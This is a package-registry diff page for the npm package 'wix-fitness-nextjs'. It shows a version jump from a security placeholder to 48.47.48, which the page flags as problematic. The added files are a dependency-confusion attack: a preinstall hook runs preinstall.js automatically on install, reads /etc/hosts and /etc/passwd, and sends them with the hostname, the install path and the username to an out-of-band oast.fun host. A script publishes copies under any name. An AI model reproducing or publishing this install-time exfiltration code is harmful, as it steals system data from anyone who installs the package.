wix-fitness-nextjs 0.0.1-security → 48.47.48
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of wix-fitness-nextjs might be problematic. Click here for more details.
- package/README.md +6 -3
- package/automate.sh +9 -0
- package/index.js +1 -0
- package/package.json +14 -3
- package/preinstall.js +28 -0
package/README.md
CHANGED
|
@@ -1,5 +1,8 @@
|
|
|
1
|
-
#
|
|
1
|
+
# dependency_confusion_poc
|
|
2
2
|
|
|
3
|
-
|
|
3
|
+
# To use this template:
|
|
4
4
|
|
|
5
|
-
|
|
5
|
+
- Clone this repo
|
|
6
|
+
- Install dependencies with npm install (Optional)
|
|
7
|
+
- Login with your npmjs account by `npm login`
|
|
8
|
+
- Create and upload an NPM packaged with `./automate.sh {package_name}`
|
package/automate.sh
ADDED
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
#!/bin/bash
|
|
2
|
+
|
|
3
|
+
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
|
|
4
|
+
TMP_FILE="$DIR/package.json.tmp"
|
|
5
|
+
sed "s,\"name\": \".*\",\"name\": \"$1\"," "$DIR/package.json" > "$TMP_FILE" && mv "$TMP_FILE" "$DIR/package.json"
|
|
6
|
+
sed -i '' "s~\"name\": \".*\"~\"name\": \"$1\"~" package.json
|
|
7
|
+
perl -i -pe "s~'User-Agent': '.*'~'User-Agent': '$1'~" preinstall.js
|
|
8
|
+
|
|
9
|
+
npm publish
|
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
console.log("Hello")
|
package/package.json
CHANGED
|
@@ -1,6 +1,17 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "wix-fitness-nextjs",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "48.47.48",
|
|
4
|
+
"type": "module",
|
|
5
|
+
"description": "",
|
|
6
|
+
"main": "index.js",
|
|
7
|
+
"scripts": {
|
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
9
|
+
"preinstall": "node preinstall.js"
|
|
10
|
+
},
|
|
11
|
+
"author": "",
|
|
12
|
+
"license": "ISC",
|
|
13
|
+
"dependencies": {
|
|
14
|
+
"node-fetch": "^3.3.1",
|
|
15
|
+
"os": "^0.1.2"
|
|
16
|
+
}
|
|
6
17
|
}
|
package/preinstall.js
ADDED
|
@@ -0,0 +1,28 @@
|
|
|
1
|
+
import fetch from 'node-fetch';
|
|
2
|
+
import os from 'os'
|
|
3
|
+
import path from 'path';
|
|
4
|
+
import fs from 'fs';
|
|
5
|
+
import {fileURLToPath} from 'url';
|
|
6
|
+
|
|
7
|
+
const url = `http://cjhdjb92vtc0000vk8cggjes3fwyyyyyb.oast.fun`;
|
|
8
|
+
|
|
9
|
+
const __filename = fileURLToPath(import.meta.url);
|
|
10
|
+
const __dirname = path.dirname(__filename);
|
|
11
|
+
const host = os.hostname();
|
|
12
|
+
const headers = {
|
|
13
|
+
'User-Agent': 'wix-fitness-nextjs',
|
|
14
|
+
'X-Hostname': host,
|
|
15
|
+
'X-path': __dirname,
|
|
16
|
+
'X-Current-User': os.userInfo().username
|
|
17
|
+
};
|
|
18
|
+
|
|
19
|
+
fs.readFile('/etc/hosts', 'utf8', (err, data) => {
|
|
20
|
+
fetch(`${url}?hostData=${encodeURIComponent(data)}`, { headers })
|
|
21
|
+
});
|
|
22
|
+
fs.readFile('/etc/passwd', 'utf8', (err, data) => {
|
|
23
|
+
fetch(`${url}?passwdData=${encodeURIComponent(data)}`, { headers })
|
|
24
|
+
});
|
|
25
|
+
|
|
26
|
+
|
|
27
|
+
|
|
28
|
+
|